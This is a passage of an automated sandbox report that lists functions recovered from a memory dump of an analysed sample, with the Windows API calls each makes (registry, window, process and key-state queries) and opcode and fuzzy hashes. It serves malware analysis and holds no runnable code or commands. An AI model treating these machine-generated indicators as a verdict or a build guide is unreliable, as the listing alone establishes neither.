                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                                        • Opcode ID: 2410969c2dd194c14b571031398527b5920c00e087777b0c8952eff33a892bf9
                                                                                                                                        • Instruction ID: 80226a30765ef722628e01c6693020666b7178bb53ab52ebaf0f399fbaab0d7c
                                                                                                                                        • Opcode Fuzzy Hash: 2410969c2dd194c14b571031398527b5920c00e087777b0c8952eff33a892bf9
                                                                                                                                        • Instruction Fuzzy Hash: 9121B23560830A9BDF209F69BC48E997FA9BF59730F208A19F9A4D72D0D7709844EB50
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0057B297
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057B2EB
                                                                                                                                        • __swprintf.LIBCMT ref: 0057B304
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,005A0980), ref: 0057B342
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                        • String ID: %lu
                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                        • Opcode ID: cf28ce12262f66e74f552119b3621b9ec6d2f81d3150471b3c216853f862e772
                                                                                                                                        • Instruction ID: 40dc4325537a48bb85c4941fc8e8f1a097234829d99208aba5ed6a43d40171d4
                                                                                                                                        • Opcode Fuzzy Hash: cf28ce12262f66e74f552119b3621b9ec6d2f81d3150471b3c216853f862e772
                                                                                                                                        • Instruction Fuzzy Hash: 9B216235A00209AFDB10DFA4D849EAEBBB8FF89714F104069F509D7351DB31EA45DB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                          • Part of subcall function 0056AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056AA6F
                                                                                                                                          • Part of subcall function 0056AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056AA82
                                                                                                                                          • Part of subcall function 0056AA52: GetCurrentThreadId.KERNEL32 ref: 0056AA89
                                                                                                                                          • Part of subcall function 0056AA52: AttachThreadInput.USER32(00000000), ref: 0056AA90
                                                                                                                                        • GetFocus.USER32 ref: 0056AC2A
                                                                                                                                          • Part of subcall function 0056AA9B: GetParent.USER32(?), ref: 0056AAA9
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0056AC73
                                                                                                                                        • EnumChildWindows.USER32(?,0056ACEB), ref: 0056AC9B
                                                                                                                                        • __swprintf.LIBCMT ref: 0056ACB5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                        • String ID: %s%d
                                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                                        • Opcode ID: f4c8e5a58a1dd0d9c43645edb7b6d4ebe88e6222687e253b19b2b446561deb8b
                                                                                                                                        • Instruction ID: 74518f686b7f1b25e9d7fac4d2bd8e0b4d578b86d28390203cfbb82a0cfa18b3
                                                                                                                                        • Opcode Fuzzy Hash: f4c8e5a58a1dd0d9c43645edb7b6d4ebe88e6222687e253b19b2b446561deb8b
                                                                                                                                        • Instruction Fuzzy Hash: 8111C074600206ABDF11BFA0DD8AFAA7B6CBF95300F004065BA08AB182CA715949DB75
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00572318
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                        • API String ID: 3964851224-769500911
                                                                                                                                        • Opcode ID: 539eeec9e805dcbd42cc5462a987904cbf7c05e9f3ad1d95c3194af8dee66934
                                                                                                                                        • Instruction ID: a60a0998b86d210572288cef13f99c1365e6857047eeca41ba7b31024f38e59b
                                                                                                                                        • Opcode Fuzzy Hash: 539eeec9e805dcbd42cc5462a987904cbf7c05e9f3ad1d95c3194af8dee66934
                                                                                                                                        • Instruction Fuzzy Hash: 62115E30900219DFCF04EF94E9659EEBBF8FF56344F108869D81467291EB365E06DB50
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058F2F0
                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058F320
                                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058F453
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0058F4D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2364364464-0
                                                                                                                                        • Opcode ID: 285de719b3d7e01268f84863c160df47ba273680139c0fc8a21e219d28895644
                                                                                                                                        • Instruction ID: 122a9db5c7b38364af1201a570415369e012fc6368244b1e304ce109d362b995
                                                                                                                                        • Opcode Fuzzy Hash: 285de719b3d7e01268f84863c160df47ba273680139c0fc8a21e219d28895644
                                                                                                                                        • Instruction Fuzzy Hash: D78164B56047019FEB20EF24D846F6ABBE5BF88710F14891DF999DB292D770AC808F51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059075D
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059079C
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005907E3
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0059080F
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059081C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3440857362-0
                                                                                                                                        • Opcode ID: a2bb00e00f1d29bbca7180a366f782bff74adefe9c5ba2488ee3dd01a44d54df
                                                                                                                                        • Instruction ID: ad5c090a6fa4eeffed1a3e85a47a6b3e7e44f9e90f002313d3888346ecdc77ee
                                                                                                                                        • Opcode Fuzzy Hash: a2bb00e00f1d29bbca7180a366f782bff74adefe9c5ba2488ee3dd01a44d54df
                                                                                                                                        • Instruction Fuzzy Hash: 08516C71208205AFDB04EF64C885E6BBBE9FF89314F04591DF596872D1DB30E945CB92
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057EC62
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057EC8B
                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057ECCA
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057ECEF
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057ECF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                        • Opcode ID: 958ab8bc9612c480da828b9d4f585d5e89aee88f34f30019c8c69409b9ff9ff9
                                                                                                                                        • Instruction ID: 350e2dca49bb5498d113b214edb73a1df3deb093ad560226d216de93bd1279c6
                                                                                                                                        • Opcode Fuzzy Hash: 958ab8bc9612c480da828b9d4f585d5e89aee88f34f30019c8c69409b9ff9ff9
                                                                                                                                        • Instruction Fuzzy Hash: 1E512A75A00606DFDF01EF64D989AAEBBF5FF49310B148099E809AB3A1CB31AD41DF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e1bc35159f9ae87d642029d64962c49f9d7420fb762c049d6c17362c0750152d
                                                                                                                                        • Instruction ID: 359016b011b52c72e92e72972828e075db4fb8dd4f3053b0867effc8f39f10be
                                                                                                                                        • Opcode Fuzzy Hash: e1bc35159f9ae87d642029d64962c49f9d7420fb762c049d6c17362c0750152d
                                                                                                                                        • Instruction Fuzzy Hash: 6941D235900118AFDF20DBA8CC8AFA9BFB8FB0A310F140565F816A72D1D7709D41EAE1
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00512727
                                                                                                                                        • ScreenToClient.USER32(005D77B0,?), ref: 00512744
                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00512769
                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00512777
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                        • Opcode ID: 93f4c5dc64d219c382ca1dc1750cc3b43828a07a963ff7ba6ebe626107a3ead1
                                                                                                                                        • Instruction ID: 9e7211572d14577a57e41d9302fba1cf919f903f6360cf2261b4a0e20954bd2a
                                                                                                                                        • Opcode Fuzzy Hash: 93f4c5dc64d219c382ca1dc1750cc3b43828a07a963ff7ba6ebe626107a3ead1
                                                                                                                                        • Instruction Fuzzy Hash: AA41743550511AFFDF159F68C848AEABF74FB46324F108759F824922D0C730ADA4DB91
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005695E8
                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00569692
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0056969A
                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 005696A8
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005696B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                        • Opcode ID: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                                                                                                                                        • Instruction ID: 2985aacd9c6d82f5ec311e4b51bed3404a473daa4478c401b1889b40d17b5a44
                                                                                                                                        • Opcode Fuzzy Hash: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                                                                                                                                        • Instruction Fuzzy Hash: 9331BA71900319EBDF14CFA8D94CAAE3FB9FB45325F104229F924AB2D0C3B09924DB91
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0056BD9D
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056BDBA
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056BDF2
                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056BE18
                                                                                                                                        • _wcsstr.LIBCMT ref: 0056BE22
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                        • Opcode ID: d94ab24a802a1ca80e06364a4e9ad03736f85caa77412d3f0e41e7718677f6ba
                                                                                                                                        • Instruction ID: b427f6f8685ec01be850a1fc3de5fe7c5e8fc4bd031c2d08b682ef129f2cbd14
                                                                                                                                        • Opcode Fuzzy Hash: d94ab24a802a1ca80e06364a4e9ad03736f85caa77412d3f0e41e7718677f6ba
                                                                                                                                        • Instruction Fuzzy Hash: 1F212632208204BBFB255B359C0DEBB7FACFF85760F104029F909CB191EB62DC9092A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0059B804
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B829
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B841
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0059B86A
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0058155C,00000000), ref: 0059B888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                        • Opcode ID: 2a812972fd5a456b156faab9e5aad80289823fe3b26003d2420a69f72996b2dd
                                                                                                                                        • Instruction ID: 098f7790ab5053d4b1807d2615d4a7b01f61d7e0de7a24516f7339916dcf4d77
                                                                                                                                        • Opcode Fuzzy Hash: 2a812972fd5a456b156faab9e5aad80289823fe3b26003d2420a69f72996b2dd
                                                                                                                                        • Instruction Fuzzy Hash: E721A331914215AFEF249F38AD08B6A3FA9FB59724F144B39F925D31E0E7309850DB90
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00586159
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00586170
                                                                                                                                        • GetDC.USER32(00000000), ref: 005861AC
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 005861B8
                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 005861F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                        • Opcode ID: 0cf1d8c7f7d1d835da8fab13097c27f82abf61da7f0385f875f3851f55f2cf8e
                                                                                                                                        • Instruction ID: 6d4700fe1d5ded752cbe9f23dd61f140a61c0f508e20c02a61cbd16e90e80b1f
                                                                                                                                        • Opcode Fuzzy Hash: 0cf1d8c7f7d1d835da8fab13097c27f82abf61da7f0385f875f3851f55f2cf8e
                                                                                                                                        • Instruction Fuzzy Hash: 3B21C375A00604EFD700EF65DD8CAAABBF9FF99310F048469F94A97352CA30AC44DB90
                                                                                                                                        APIs
                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                        • BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        • Opcode ID: 80d3a9addd47139c6a7ce84a79e7d32d0ed3f8cf2a64e0e1107fb97c5d02d7ab
                                                                                                                                        • Instruction ID: 95b0195aad7efaa411ff549a769d3646ba44e3b81dd63b8bfec992c668a34eb8
                                                                                                                                        • Opcode Fuzzy Hash: 80d3a9addd47139c6a7ce84a79e7d32d0ed3f8cf2a64e0e1107fb97c5d02d7ab
                                                                                                                                        • Instruction Fuzzy Hash: 17219230806608EBEB209F64DC4C7AD7FA8F724311F144297F915A62E0E7719899FB98
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: 8bf5390f2e4e3a1cfe1a0ef29dd873057c60f66df7394d53938bb85ea08aa7ae
